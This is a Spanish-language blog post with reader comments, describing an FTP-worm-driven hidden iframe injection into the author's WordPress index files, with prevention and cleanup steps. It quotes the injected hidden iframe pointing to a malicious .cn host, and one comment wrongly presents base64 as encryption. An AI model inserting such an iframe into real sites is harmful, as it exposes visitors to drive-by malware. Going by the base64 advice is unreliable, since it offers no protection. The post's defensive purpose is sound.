publica aqui tu favicon
publica aqui tu favicon publica aqui tu favicon publica aqui tu favicon publica aqui tu favicon publica aqui tu favicon publica aqui tu favicon publica aqui tu favicon publica aqui tu favicon publica aqui tu favicon publica aqui tu favicon publica aqui tu favicon

Ataques de iframe como prevenirse y como bloquearlos

Elaborado por ju4nm4 Guardado en ayuda |

Ataques de <iframe> como prevenirse y como bloquearlosDias atras casi me vuelvo loco por un ataque masivo de <> a toda la red de mis blogs, contacte al soporte, es mas a ambos soportes, pues tengo mis paginas en dos servidores diferentes y como no entiendo mucho de ingles, traté de traducirlo con el google, indague un poco y encontre cierta informacion sobre estos .

Los de se producen generalmente por un interno en nuestra pc ¿como es esto? es un gusano para programas FTP, como Filezilla, Core Ftp, etc.

Lo que hace este es como lo haria cualquier otro, usa nuestra propia desatencion, porque generalmente lo que hacemos con los programas FTP es GUARDAR LA CONTRASEÑA, para agilizar la tarea de conectarnos a nuestro servidor, es mas yo lo hago porque no recuerdo la contraseña de mis mas de 10 sitios (eso es otra historia), entonces el aprovecha esto, se conecta e inserta malicioso en nuestro index produciendose asi una caida de nuestra , o como en mi caso y de los blogs de wordpress algo como esto:

Ataques de <iframe> como prevenirse y como bloquearlos

Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home/usuario/public_html/index.php on line 17

Parse error: syntax error, unexpected ‘.’ in /home/usuario/public_html/index.php on line 17

Claro que mi soporte tecnico me dijo lo mismo, ud tiene un ataque de , debe realizar lo sigte:
1. No guardar las contraseñas de acceso a su cuenta (de hosting)
2. Pasar un antivirus en su pc, para eliminar cualquier espia, o malvare.
3. Contactar a su webmaster para corregir el codigo de su

Dicho esto, me di cuenta que el problema no era de ellos, sino enteramente mio, entonces me baje el index.php (del theme) y busque linea a linea cual era el bendito error, y en el fondo del archivo el habia borrado algunas lineas y colocado un , que tenia la sigte linea.

< src=”http://bestlitevideo.cn:8080/index.php” width=133 height=120 style=”visibility: hidden”></>

Entonces borre esa linea, agregue lo que habia borrado (por suerte tenia un backup del theme) y volvi a levantarlo, pero todavia no se habia solucionado, el modifico un par de archivos del wordpress, los index.php y otros archivos de la carpeta de inicio, entonces tuve que modificar (para prevenir) todos los archivos del wordpress.

Ahora se preguntaran como prevenir este tipo de ?

1. Nunca guardar la contraseña de nuestras cuentas de FTP
2. Tener siempre un backup de nuestro script, theme o nuestro site.
3. Ante cualquier ataque, caida rara de nuestra pagina o algun error en nuestro index contactar al soporte.
4. Tener un buen antivirus y scanear semanalmente nuestra pc en busca de malvare, spybots, etc etc.
5. Ante cualquier ataque no desesperarse sino BUSCAR en google, foros, blogs y comentar nuestro problema.

Como Corregir este ataque especifico de ? (el mio y los parecidos)

1. Borrar la linea al final de nuestro index.php (el del theme).
2. Corregir las lineas borradas por el y levantarlo de vuelta (o agregar directo el archivo backup)
3. Ver si el no ha modificado otro archivo y reemplazarlo por el correcto (el original)
4. En caso de seguir con , modificar el script completo y la plantilla (los backups).

Si alguno sigue con problemas, por favor dejar su comentario que trataremos de socorrerlo :)

Tambien pueden leer este post en ingles sobre Ataques Iframe

6 Responses to “Ataques de iframe como prevenirse y como bloquearlos”

  1. Manuel Dijo:

    hola tengo el mismo problema pero tenia intectado casi 40 archivos de php que tenia en mi servidor local con dreamweaver la verda no se como se intectarin todos esos archivos me toko borra siempre estan el la parte de abajo del atchivi php el antivirus que tengo lo detecta pero solo cuando el archivo lo ejecuta el navegador src = htp… algo asi

  2. fresprog Dijo:

    Mira juan
    Lo que necesitas es encriptrar los datos en php con el comando base64_encode, este seria un ejemplo para encriptar

    <?php
    $str = ‘lo que quieres encriptar’;
    echo base64_encode($str);
    ?>

    Para desencriptar necesitas el comando base64_desencode

    <?php
    $str = ‘VGhpcyBpcyBhbiBlbmNvZGVkIHN0cmluZw==’;
    echo base64_decode($str);
    ?>

  3. Andres Dijo:

    Aquí hay información que les servirá para entender y prevenir futuros ataques.

    http://www.clubdesarrolladores.com/articulos/mostrar/82-ataques-xss-el-peligro-de-hacer-echo-s-get-var-

    http://foro.elhacker.net/seguridad/bloqueando_un_ataque_iframe-t127481.0.html

    Saludos.

  4. Pepe Dijo:

    Nosotros en el trabajo hemos sufrido un ataque similar, pero lo que se inyecta es un script que produce el iframe al ejecturse en el cliente.

    ¿Es lo mismo?

  5. diseño web Dijo:

    Asi es Pepe, es lo mismo

  6. RicX Dijo:

    Yo recomendaría también después de un ataque de este tipo cambiar la clave de acceso http://FTP.

Deja un Comentario